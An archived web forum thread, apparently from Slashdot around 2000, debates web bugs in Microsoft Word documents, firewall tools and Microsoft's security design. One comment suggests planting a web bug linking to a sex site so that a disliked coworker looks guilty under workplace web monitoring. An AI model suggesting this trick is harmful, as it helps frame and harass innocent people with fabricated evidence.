Ok, so if the Privacy Foundation is so upset about web bugs in MS Word documents, why does their OWN ADVISORY have a web bug in it? My filter (Guidescope) caught this little sucker: http://www.privacyfoundation.org/graphics/1pix.gif (Awaiting an explanation.)
==
This post sponsored by the American Obstetrics Society:

Re:Pot, Kettle, Black

[Philippe]

It's a spacer gif. Big deal. Web designers use them all the time. Plus, it's not a web bug since it originates on the same server.

New Features!!!!

[SlashGeek]

Hmm.. Another "Feature" in a Micro$oft product, this one is almost as good as the one that lets nice people run .vbs scripts on your computer for you in Outlook =) Gee, is it any wonder why Windoze is closed source?

I guess he was true to his word when he said "We are more concerned with adding new features than fixing bugs.." Wow Bill, I can't wait till the next Windoze release to see what nice "Features" you have added!!!

Its M$, so it must be bad.

[Bender+Unit+22]

This is a feature in the program that you can embed web content in your document. I have the feeling that because it is in a M$ program, it is a evil thing. Would this have been a feature if it was in Star Office on X? I could see a lot of good uses for this feature as well as bad.
It's like cookies. Cookies can be very good when programming a website that will user-friendly, but they can also be used for "evil" purposes. The only thing to do is education.

Everything these days are linked to the internet. Every program you get these days has a "Automatic Update" and depending on how paranoid you are, the feature is a way of keeping an eye on you personally. You can't enjoy the wonders of the web these days without someone is making some kind of a log somewhere. Now I am not saying that I enjoy this. I have a "personal firewall" on my PC so that I can see when a program wants to go online, since my PC is "Always On", I need this because the only way to disconnect from the internet for me is to unplug the cable from the LAN.
What people need is to be aware of what the computer is about. Clever people who sells PCs, tries to give people the impression that the PC is as "simple" as your VCR. Only few users(mostly the /. type) understand what the consequence of installing a program can be and what they need to be aware of.
These problems becomes even more scarry as progress gives the population connections like DSL connections where they will be "always on".


---

Here is how I read word docs.

[Ice+Station+Zebra]

#strings "why do most word users place spaces in the file name.doc"

You can do this with Star Office

[dubious21]

Open up a new text file and insert a graphic whose file location is on a web server and it does the same thing. This is not a big deal. This is not a MS problem. Makes me wonder why I bother coming here anymore. You are hard pressed to find stories that are not flamebait. This story should never have been posted in the first place. it is a non issue.

Windows Media Player has the same problem ...

[dougmc]

Nobody seems to have mentioned it yet, but Windows Media Player files can (and are) be made to to go to a web site during, before of after the movie places. This has all the same security implications that the Word/Excel/whatever problem has, except that it's typically obvious when it happens.

Re:More reason to use pine

[r2ravens]

This is all the more reason that I use pine to read my mail and reject (>dev/null) most html-only mail I receive.

If I get something really important from one of my friends or acquaintances, I might save and look at it in vi... but not before shooting a return message to educate them that I won't read the next one they send in html-only format.

Remember, there is a special place in hell for those who send html mail. :)

How to block this

[Ryan+C.]

Anti-trojan programs such as Zone Alarm are great to stop things like this. If a Word doc tried this, Zone Alarm would pop-up a box saying something to the effect of "MS Word is trying to access the Internet, OK/NO/NEVER/ALWAYS. Word has long ago gone into my list of apps too stupid to be trusted and can't get to the Internet. Ryan Campbell

Re:This isn't much different than Web Pages alread

[Col.+Panic]

How about making it a /. poll which will open discussion about it for a few days. Maybe something like:

Reasons people skip /. articles and go right for the comments:

to get furst

to be the first to pay homage to NP

to look like an idiot in front of one's peers

Re:So maybe...

[lpontiac]

IIRC, many branches of the US Government (in particular, the Department of Defense) standardised on SGML. Wordperfect was the wordprocessor of choice because it supported SGML. Of course, the US Federal Circuit makes it's rulings available in Word 7.0 format... *sigh*.

And the issue is?

[Bagheera]

I read the post on BugTraq earlier today and my immediate reaction was "and the point is?" Shutting off this "web bug" is trivial if someone is concerned with privacy. It's also relatively useless for tracking confidential information, unless the Industrial Espionage community has somehow managed to miss the "You're on the Net, you're vulnerable" point.

While it can provide some useful information (as someone pointed out with the resume thing) a well configured proxy server completely negates this little "bug."

Honestly, this is no more insidious than logging normal connections to a web server. While the cookie issue is a potential concern, it shouldn't be a big deal to bypass. After all. How hard is it to modify your cookie files?

We won't go into the bloatware aspects of Word, or why they seem fascinated with 'transparently integrating" everything. This is pretty much a non-issue.

Re:And the issue is?

[talks_to_birds]

"Never attribute to malice what can as easily be the result of incompetence..."

...and your very own .sig line betrays what the issue is.

The vast majority of business or governmental users of Word don't even begin to have a clue about these wonderful *features* that Micro$oft keeps coming up with.

"While the cookie issue is a potential concern, it shouldn't be a big deal to bypass.

After all. How hard is it to modify your cookie files?"

Are you kidding?

How many worker in a business or governmental setting are aware that the PC they work on probably has a full-time, always-on internet connection, even when they're *not* running IE?

And of those people, how many would even begin to think that using Word, or viewing a Word document, would initiate a connection out onto the internet that involved the setting a reading of cookies?

Here's a hint: nobody.

The issue is that once again, there is a *feature* in a Micro$oft product which exposes unsuspecting, unknowledgeable users to a wide range of potential risks that they are utterly unaware of.

Hell, most IS sections are probably unaware of this issue, and too busy to do something about it if they knew what to do...

Micro$oft built this into Word, acting as though the entire universe works in some ideal, secure bell jar, far, far away from crackers and script kiddies.

The real world is nothing like that at all.

Hell, today at work I got *yet another* one of those life-phases.txt.txt (or whatever the hell it was..) attachments in some email.

Remember that wonderful *feature* from Micro$oft: default excecution of a VB script email attachement?

Micro$oft has no clue about the real world: they're too ingrown and monolithic.

And they're too arogant to care.

t_t_b
--
I think not; therefore I ain't®

IE Security

[Deathlizard]

Question. If Word uses IE to get the information on a word document, would that tranaction be covered under IE's security Settings?

As for the bug itself, It dosen't surprise me because it's Microsoft's model of making software. The reason Microsoft software is like that is because their programming model insists that if a module already exists on the system, use it. This isn't a bad model to follow because it keeps program size to a minimum but it does raise security issues.

Everything That Microsoft makes nowadays intergrates with everything else Microsoft Makes. It's what businesses want. They dont want to have to switch applications around when they want to send a word document in E-mail for example. they just want to push a button, which turns word into an E-mail program and send the mail. The problem with this is that MS does not think of the possible security implications when they do this.

Their biggest focus right now should be a system wide global security model that intergrates into all of their software products, but as of yet, nothing like this exists. The only product that has security right now is IE, and even it's lackluster at best. Win2k is really close to this but it still leaves the remote Internet part of the machine behind. ALthough you could set it up so that a user could log in and do absoletly nothing from there, including logging off and even seeing a start menu for that matter.

Their main security focus is Local System security when in reality it should be focused on Both local and remote security

-
BTW Does anybody know how Extrans Work?

Re:IE Security

[Felinoid]

This sort of code reuse is not unlike what is allready done in Unix.
Byond libarys you may pipe from one program to annother.

But....
It ends up being the users choice...
Should my e-mail be in Netscape? Or Pine... Netscape should call up pine and pipe the information....
Quite a number of apps exist that call up "the web browser of your choice" in Linux... tin allows you to send usenet posts to outside applications...
Pipe content to more... ls -xF |more
du | more

It should not be automatic that graphics are pulled by a browser... you should be able to call them up from a graphics viewer instead... like XV.

Unix programmers don't allways make full use of this and thats sad but it's a neat feature to have...
Being able to pipe content from IRC into e-mail... becouse I set that up... not becouse IRC used the wrong part of e-mail code...

Irony: Web bug in

[JohnQPublic]

Slightly off-topic, but the link above to Transparent Society triggered Opera's third-party-cookie detector, thus allowing me to defeat the web-bug placed in the article page.

Word*view* as well.

[DeeKayWon]

I don't have Office, but I use their WordViewer to read Word docs in my Win98 partition. I tried the bugged .doc file and sure enough, Zonealarm notified me that Wordview was trying to access the internet. However, Zonealarm didn't report anything when I opened the bugged Excel file in Excelviewer.

Re:This isn't much different than Web Pages alread

[GrammarPolice]

Unless the spell checkers these days post you're most embarrasing mistakes on the net, the Word bug problem is worse by far!

No need for that, since you seem perfectly willing to post them yourself. Try your and embarrassing.

FUD

[Saint+Stephen]

The noise about this surely disabuses us of the notion that the ABM camp isn't capable of FUD.

Not a bug.. a feature.. a stupid one

[Felinoid]

This is "Yet annother feature" in a long list.
Yes they are features... They are there for the user to enhance the user experence...
All in all they are very much features and do exactly as they were designed...

But thies are stupid features.
The people designing thies features DO NOT think about how they will be used or about the people who will use them.

In order to make a "User Friendly" operating system you MUST protect the user against himself. You MUST consider how the avrage intelegent[1] user will behave and how he will use that feature.

Email viruses are a result of NOT thinking about standard user behavure or protecting the user from himself.
Such things are excusable in an operating system preportedly for techs like Linux or Solarus but not for the avrage user like Windows or Mac.

Linux and Solarus programmers do give SOME consideration to the user experence. Not nesssiarly much but enough to know not to run something sent in e-mail before the user has a chance to examine it first.

E-mail clients don't run code.. that is outside it's function. Wordprocessors shouldn't run programs or execute commands eather.
Nither should wordprocessors pull data up from the outside world.. or call up web browsers...
A wordprocessor file is self contained.. at least should be..

HTML should do this.. HTML dose this... we expect this of HTML..
But a wordprocessor document is a static document. It should never do anything a printed page wouldn't do.
Many HTML documents are "Living" documents and behave very diffrently from wordprocessor documents.

All this behavure is totally normal for an internet document. Wordprocessor files are NOT internet documents.

If emacs did this we wouldn't go bizerk... emacs is far more than an editor.. we expect it to flip and dance. Thats the neat part... thats also why it's a bit on the big side (for an editor..)
But then I use pico for my editing needs...

It's like if your car started to fly when you didn't expect it.. That would NOT be good.
Hovercraft.. yes... Car.. no...

It's a neat SOUNDING feature...
But whats the function?
This is no good...

Microsoft keeps adding thies features and Windows is going to have a great deal of unexpected behavure...
And Linux will seem easy in comparson...

With Linux you know what to expect...
The whole idea of having a user friendly os is so you can easly understand whats going on just by looking at the pritty pictures...

But thats not going to happen when your wordprocessor wants to load stuff from the Internet.
That makes no sence....

At least with Linux the user might be able to figure out why his offline document isn't loading... he'll recognise the attempt to load stuf from the network.... when the DSL or Cable modem is turnned off...

Mac really is user friendly....
I guess thats why Linux develupers are droolling over MacOs hacks... But we end up copying Windows simply becouse Microsoft isn't original enough to get a look and feel patent on anything.

[1] It was once thought you could make an idiot proof operating system but idiots proved to be overwhelming.
The target is scaled back to intelegent users who simply don't have the time to learn what an RS232 is.
Dumb users are simply byond all hope...

FUD fud everywhere...

[Felinoid]

Realisticly speaking...
Open source therefor not FUD? Wrong...
Microsoft therefor not Zellot? Wrong
Linux advocate therefor Zellot? Wrong
Assume nothing.....
There are whitehats at MsHQ, BlackHats in Open source...

However for the moment Microsoft is very dark gray and open source very very light gray...

But there are bad guys in every group....
Zellots in every camp... FUD from all sources... No body is perfict...

This is minor stuff

[Metrol]

Any webmaster who has put Word through it paces already fully understands this exploit. The notion of pulling in graphics dynamically from a remote site is old news. Also, since Office 95 all the apps in there stopped being what they were and became development platforms. That's five years ago folks, hardly late breaking news.

What I can't ever seem to get posted early in an article such as this is a warning about the wonders of the .reg files. Mark my words here, we'll be hearing a LOT more about .reg file links in E-Mail and on the web making systems unusable.

If you're a Windows user, go into Netscape right freaking now under Edit-Prefs-Navigator-Applications and take out that entry for .reg files. Through the use of a link or even a re-direct a nasty site can do some pretty damaging stuff with a far smaller file than ILOVEYOU was.

On the other hand if you're an IE user... ummm, I hope you remember that browser integration with the OS is a *cough* Good Thing(tm). Keep remembering that through the repair install.

Works also with Staroffice in Linux

[Jump]

Yes! It also works with Staroffice 5.2/Linux. Don't know if it also reads cookies.

I don't think a virus/worm is the right way to go

[jesterzog]

Sounds like fun but to be honest I hope it doesn't happen. Specifically because it wouldn't set a good example for the cause.

If in the very one dimensional, ignorant and manipulatable public eye, decss was more associated with virus-spreading crackers and script kiddees than it already is, it would only provide ethical ammo to lawsuits that are against it.

I guess the alternative is a polite self-propogating worm that asks the user's permission before it propogates itself. It wouldn't have nearly the same effect, though. :(

===

Re:Then it Should be Emasculated With All Speed!

[Opinion+Dalek]

No I am saying that Internet explorer settings should determine how cookies etc. work, not tools like Word (which are just using IE indirectly).

Of course the Internet is unsafe, but IE is the gatekeeper, not word.

Re:Its M$, so it must be bad.

[cowbutt]

Already in StarOffice 5.2! Try it and see... use the 'link' tickbox when inserting graphics from a file (specify a URL as the source).

Device driver bloat!

[shippo]

Why are so many device drivers (and not just Windows ones) so bloated?

A device driver should do no more than let the OS communicate with the device. Instead all the big companies decide to add to many extra doo-dohs and gizmos, none of which give any real benefit.

Every recent Windows driver I've seen has some additional user space control tool that does nothing that the standard dialogues offer. I've even seen fancy (and huge, > 1MB) NIC diagnostics that don't even detect that the card is the correct model as supported by the driver!

Even some Unix flavours I've used have come with bloated device drivers. One was impossible to install as the combined disk space of two device drivers was too large for the boot filesystem. The drivers in question attempted to make things easier by covering entires range of SCSI adaptors and NICs. Thanks, Compaq! Linux has got it right in this respect. Pure and simple drivers, no more.

Lobby Mozilla to keep this from happening to them

[Zigg]

Mozilla has a problem with this too, and it's in danger of being cast aside because not enough people care about it.

Go cast your vote for bug 28327!

Correct

[uradu]

That's exactly what all the "everything is a file" defenders overlook. No inodes, no security settings, other than some all-or-nothing thing. Sure you can make everything LOOK like a file (heck, even Windows does that to some extent), but that doesn't MAKE it a file. If it really is a file, copy that socket to a floppy and let me put it on my machine. Hmm?

Uwe Wolfgang Radu

Zone Alarm Questions

[linuxrunner]

All this brings up a few questions I've had.
Zone Alarm has come up a few times in these discussions. I have it and currently run it on my two computers. I've definately learned a lot more than I did about privacy since instituting Zone Alarm on my computers.

Ok, here's my question:

We know that zone alarm stops Windowz Media Player from accessing the internet but exactly what is it accessing the internet for? Anyone?

I would love to know the answer to this question.

Linuxrunner

MS Word?

[SilkyHog]

Let them put a bug in MicroSoft Word. I don't care. I use it, like most people for writing, which it was intended to be used. As for IMPORTANT documents, I use NotePad and PGP!!!!

Re:Word format for resumes

[fizbin]

I recently completed a job search (which although it ended well, did not begin well) and I didn't get any responses to the headhunting agencies I emailed my resume to until I started sending it out in word format. (Silly me; I thought HTML would be the preferred format for an internet applications programmer.)

Maybe that comment about text-only resumes applies to large companies, but in the world of small headhunting firms, Word 97 is the way you should send it to them. (My PDF-format resumes didn't get any response either, despite the fact that the most common reason I heard for wanting Word format was that they wanted to see my resume exactly as I intended)

This is one reason I actually wish everyone in the Microsoft world would go out and upgrade to Office 2000 - if I could guarantee that those people who wanted Word format all had O2K installed, then I could just have one version of my resume, and symlink resume.doc to resume.html.

(If you have office 2000, you can look at http://math.jhu.edu/~martind/resume.html and then at http://math.jhu.edu/~martind/resume2k.doc, which is just a symlink to the same file. See how easy it is to have a valid HTML file that formats nicely as a Word document the way you want it to?)

Face it - resumes are used to get you through the part of the job process that is governed not by technical people, but by people who know offices and paperwork; as far as most of those people are concerned, anything outside of Word isn't a real document.

This is why I hate them ...

[alleria]

Regarding the potential use of Web bugs to track Word documents, Microsoft said that there is no evidence that such activities are occurring.

Um, well, let's see: regardless of the potential use of cyanide to murder people, the U.S. government said that there is no evidence that such activities are occuring. It then refused to regulate sales or fix the problem in any other way.

... oh wait. The government does regulate cyanide...

E.T. phone home!!

[the+devlin]

I have only one thing to say: E.T. phone home!! E.T. phone home!!

Re:This isn't much different than Web Pages alread

[multimed]

As stated, this different from HTML because HTML is supposed to do this and we can view it's source.

But you're just plain wrong to say that if you're doing something on the Internet, to just accept that you're being logged. First of all, opening a word document is an offline activity.

MS Word peaked with version 5.1 (for the Mac anyway whatever the equivalent version was for windows) and has been downhill bloat-ware ever since.

Interesting Info from The Register

[frank249]

from the register.

Smith describes himself as the CTO of the Privacy Foundation, which we'd never heard of before - Privacy International is the long standing clearing house and advocacy body for privacy information on both sides of the Atlantic, and in Asia too. The Privacy Foundation appears to be just Smith, journalist Stephen Keating... and a webmaster.

But publicity stunt or not, Smith has drawn attention to a long standing feature of applications that use embedded content. Microsoft product manager was correct Lisa Gurry was quite correct in pointing out that this is neither new nor limited to Microsoft applications.

However the remedy she suggested was more telling than Smith's advisory. Users should disable the cookie feature on their browsers, she told CNet. Quite coincidentally, CNet itself holds the mother-of-all-patents for this kind of user tracking: a fact that our fearless friends at CNet and ZDNet modestly declined to mention in their coverage.

From Gurry's comments it sounds as if Microsoft wants the problem to fade quietly. That's unlikely, given the scope for abuse. More pertinently, there doesn't appear to be a way of turning off the attempted retrieval of remote content from within the application. You can only turn off the cookies themselves (and clobber your browser).

It took billions of dollars of lost customer time before Microsoft attempted to apply some finer granularity to its email security model, and we'll be interested to see how it reacts to this, particularly given its recent posturing as the consumer champion against the evil cookie.

HR

[latro]

Well, at most companies, your resume has to pass through the dreaded HR dept. before it gets to anybody in IT/IS. This means that they are going to want MSWord - no way around it. I usually just include the text version in my e-mail and attach the Word version.

-------

User initiating actions vs document initiating

[Sloppy]

fire up vi and type this: !!wget http://www.slashdot.org/ 2>&1 >/dev/null ; cat index.html

voila, web browsing from your text editor.

The process involved is conceptually the same as what you are talking about in Windows, except that the call to the other application is made using COM rather than invoking a new shell and then running an executable. If you had a vi macro to do the above command, then you would have the same situation as in Windows.

I think you're not getting it. There's a huge difference. In your vi example, the action you're describing is triggered by the user, or by a macro that the user has set up (and he still has to trigger the macro himself). But can you create a file witha wget command in it, and send it to me, so that when I load it into vi, my computer will run wget? No.

It has nothing to do with subshells or COM. It's about documents becoming applications. Users make choices that can effect their security whenever they run programs or perform actions in programs. With Microsoft apps, now merely viewing a document is an action that can have an impact on his security.

Because of this, Windows is now a system that should only be used by trained experts. Think about that, the next time you're buying a computer for grandma. Will grandma understand that viewing a document that someone sent her, gives the sender power over her computer (and therby power over herself, if she uses the computer for anything important)? Even Linux would be a better choice! (But a Mac would be best. :-)

---

Re: ...With All Speed! - Is Active Content okay?

[MidnightLog]

Don't you think that a better solution would be to use appropriate tools for the purpose of "automation" and have properly trained staff who must use them. A task with consequences as serious as this should be done by trained professionals and not blundering amateurs.

Its a shame that this is currently at 0 and Opinion Dalek's response is at 1. Please get yourself an account Mr. (or Ms.) Anonymous Coward.

I wonder if "Active Content" is a worthwhile thing to have. Instead of any old Word document being able to automate my system, I would prefer if the scripts needed to be separate from the document. The extension of the script file would indicate the type of language it is written in instead of the container it is trying to automate.

In this way, things could still be automated, but you have the opportunity to secure things on a script by script basis instead of on an action by action basis. In addition, people can tell whats what simply by looking at the file extension. If you received a document and associated script file attached to an e-mail, you could choose to run the script or simply open the document itself. More options would be available to the content "consumer". I believe this is a good thing, but I'm not a content "producer". They may have a different viewpoint.

Re:Zone Alarm

[JackVance]

ZoneAlarm Pro offers password protection, and customized security features. If you run a network it might be worthwhile, but for personal use the free version should be plenty.

You can probably find more information on Steve Gibson's Shields Up! newsgroup at news.grc.com

Re:This isn't much different than Web Pages alread

[Karellen]

"A couple of years ago, people didn't expect to have Word Processors to check your spelling as you type."

Yeah, and that sucks too.

It slows me (and everyone else I know who can type) down no end by interrupting and destroying a chain of thought, or just the general flow of typing.

Turn it all off. Spell check at the end and fix problems then. It takes less time in the long run cos you're spending less time context switching.

Re:This isn't much different than Web Pages alread

[Kaa]

General rule of thumb: If you're doing something on the Internet, you're being logged.

Generally true, but if you are willing to suffer some inconveniences, you *can* significantly raise the level of your anonymity on the web. A simple way is to use Freedom anonymizer (non-free in both senses and no Linux version, but very useful nonetheless). The logging goes on, but logging content-free data is not very useful.

Do something useful: read "Transparent Society" and/or work on making yourself a more tolerant person, rather than fretting about your "privacy" (unaccountability).

Thankyouverymuch. I don't like Brin's ideas and would do a lot NOT to live in a society as he describes. I also don't see why you think that tolerance and desire for privacy are opposites or at least negatively correlated. Not to mention that privacy != unaccountability (you probably had anonymity in mind, but even then != stands).

Kaa

Re:Lobby Mozilla to keep this from happening to th

[Karellen]

One thing I'd really like mozilla mail to do is have a prefs checkbox option that is simply

"View all email as plain text"

So, if I get an HTML email, I see all the tags. If I get a multipart (text AND html), I see both parts, with all the fucking cruft along with that. If I get attachments, I can see the text of all of those as well.

In fact, I want 'view source' for all my emails on by default.

Yes, keep the 'headers' options, so that you can select which headers to view (all, normal, brief) as is currently, and keep the box to get a list of attachments and the option to save them each individually.

But I'd really like an option to view the text of a whole email as plain text. That's what emails were for, and that's the way I want to read mine.

That would solve _all_ of these types of bug (present and future - someone mention in the comments for that bug that if you turn off images from sites, malicious sites could put in links to stylesheets or some other resource - this may be extended in the future), and let me see at a glance all the cruft my colleagues are passing around, and ask them (politely) to stop it.

Re:Then it Should be Emasculated With All Speed!

[MidnightLog]

Of course the Internet is unsafe, but IE is the gatekeeper, not word.

I'm not sure that the all-in-one approach that MS is using for Internet security is the right one, but if it is then the IE settings need to be a lot more flexible. Here's my wish list for improving IE security. Please note that I'm no expert on IE security settings, and I don't have IE installed on this computer so I can't check things as I type, so some of these ideas may already be implemented in one form or another.

• There should be several levels of trusted (and restricted) sites.
• You should be able to classify sites into a trusted or restricted level in a more generic way. Defining site names with regular expressions may be the way to go here.
• You should be able to determine what the default level is for web browsing.
• There should be a separate level for HTML viewer applications like e-mail or Word. This would allow you to turn images off for HTML e-mail, without doing that for regular web browsing.
• You should be able to create a new security level.

The article is about depression, not computers.

[Futurepower(tm)]

The key sentence in the article "Ain't no network strong enough" is:

"Schneier sympathizes; he admits that depression forced him to cease working on the manuscript for over a year."

This is not an article about computers; it is an article about a man's problem with depression. Mr. Schneier cannot admit to himself directly that he has inner conflict, so he is using computer security as a symbol of his conflict.

Open BSD (http://www.openbsd.org/) advertises: "Three years without a remote hole in the default install! Only one localhost hole in two years in the default install!" This result has been achieved by auditing the source code.

Windows 98 is not an example of hopelessness of computer security; it is an example of the business model of a monopoly. Microsoft makes more money if it provides buggy software; the bugs give users a reason to upgrade to a new, slightly less buggy version.

Extremely rapid progress is being made in computer security; it is incorrect to paint a picture of hopelessness.

Re:The article is about depression, not computers.

[garnier]

I think you are comparing apples with oranges here. What does OpenBSD have to do with Windows 98?

OpenBSD is an OS targeted at small to medium size servers which are almost always networked. It is very secure and very stable so it is very good at its job.

Windows 98 is targeted at PCs that are connected to the Internet using a modem. It does not run any services so it is quite secure in that aspect. It is very easy to install. It runs thousands of applications and games (which all install with minimum fuss). You simply cannot do all that with OpenBSD (yet?). Having a BSOD once every few weeks while surfing the Internet or editing a document in Word is a compromise that most people are willing to make (and do make), since the alternative is to become a CS major first and then install Linux/OpenBSD/whatever and then not being able to run the applications that you are familiar with.

As for your argument with Microsoft putting bugs so that they can then sell upgrades with fewer bugs, this is just your paranoia talking. I am not saying that if their QA as more strict they couldn't produce a more stable OS but this is a long way from saying that they put bugs there on purprose. Besides look at the deterioration in performance in all the windows releases:
Windows 98 less stable than Windows 95 less stable than Windows 3.11
Windows 2k less stables than Windows NT4 less stables than Windows NT 3.51

How to screw those you hate

[Autonomous+Crowhard]

If you work at a company that traces web activity, here's a simple trick to play on people you really hate:

Insert a web bug for www.sex.com!!!

"Gee, Simon... It looks like you've been viewing nudy sites during work hours."

"But sir... I was just reading the product documentation."

The possibilities are endless!

Re:Its M$, so it must be bad.

[Bender+Unit+22]

Interesting, so much for attacking M$ :-)
---

Narmaluc

[carrier+lost]

This is good. This is fun. It is good that we are all here to hash this out. To make sense of this, to exercise our mighty muscles of invective and investigation. We are spinning away at the wheel of truth, cobbing webs of vision and genecity from simple strands of plaint.

Microsoft doth vex us so, in its huge and omnivorous, yet soft, ware-arms. We tumble restlessly in marketing induced dreams, waking fraily, faintly to calls of life and freedom, but never rousing fully. For the beast is huge and surrounding and fighting on every front seemingly invisible foes is sure to grant one special lodging in the House of Crank.

You and I brother, sister, we stumble forth into this digital-electro future knowing fully its past, seeing the lessons hidden from the teeming hordes of TV surfers.

We shall be banished, ridiculed and, in the end, reeducated.

MjM

Re:I don't think a virus/worm is the right way to

[Alley+Viper]

This is exactly what I said about the notion that someone hack into sony.com as a result of that VP's crazy Napster comments... While I wouldn't be surprised if someone does it, and would get a chuckle out of it, the mainstream media will immediately paint the people creating this worm, even if it has no malicious behavior whatsoever will paint the authors as big bad scary hackers, thereby making the entire DeCSS/Napster/whatever movement look like a bunch of scruffy-faced anarchistic teens who need to be put it line.

Re:I don't think a virus/worm is the right way to

[Alley+Viper]

I just realized that I made numerous grammatical errors in that last reply, as well as writing a sentence too damn long for its own good.

One more good reason to actually look at the preview.